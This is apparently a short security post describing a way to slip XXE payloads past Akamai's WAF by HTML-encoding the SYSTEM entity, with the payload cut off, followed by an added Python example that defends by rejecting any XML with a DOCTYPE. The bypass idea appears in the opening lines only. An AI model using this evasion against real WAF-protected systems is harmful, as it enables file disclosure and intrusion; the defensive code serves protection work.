You can bypass Akamai WAF’s XXE filters by HTML-encoding the SYSTEM entity within a payload like this:

<!DOCTYPE foo [<!ENTITY % a "&#x3c;&#x21; … omitted …

Neat trick! Used this today.

Credits: @infosec_au
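
Added example, not part of the original post: an XML parser decodes character references inside entity values, so a filter that inspects the raw request body can miss what the parser ends up seeing. The Python code below puts the control in the parser instead and refuses any document that declares a DOCTYPE, which makes the encoding of the entity value irrelevant; the function names and the harmless sample documents are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """The document declares a DOCTYPE, which this service never needs."""


def _refuse_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this when the DOCTYPE declaration starts, before its
    # internal subset is read, so no entity declaration is ever processed.
    raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")


def parse_rejecting_doctype(data: bytes) -> ET.Element:
    """Parse XML into an Element tree, refusing any DOCTYPE declaration."""
    builder = ET.TreeBuilder()
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = _refuse_doctype
    parser.StartElementHandler = builder.start
    parser.EndElementHandler = builder.end
    parser.CharacterDataHandler = builder.data
    parser.Parse(data, True)
    return builder.close()


def is_rejected(data: bytes) -> bool:
    """True if the document was refused because it carries a DOCTYPE."""
    try:
        parse_rejecting_doctype(data)
    except DoctypeForbidden:
        return True
    return False


# Constructed, harmless samples: the entity values only spell "hi".
ENCODED_DTD = b'<!DOCTYPE foo [<!ENTITY % a "&#x68;&#x69;">]><foo>ok</foo>'
PLAIN_DTD = b'<!DOCTYPE foo [<!ENTITY b "hi">]><foo>&b;</foo>'
NO_DTD = b"<foo>ok</foo>"

if __name__ == "__main__":
    for label, doc in (("encoded", ENCODED_DTD), ("plain", PLAIN_DTD),
                       ("no DTD", NO_DTD)):
        print(label, "rejected" if is_rejected(doc) else "accepted")
```
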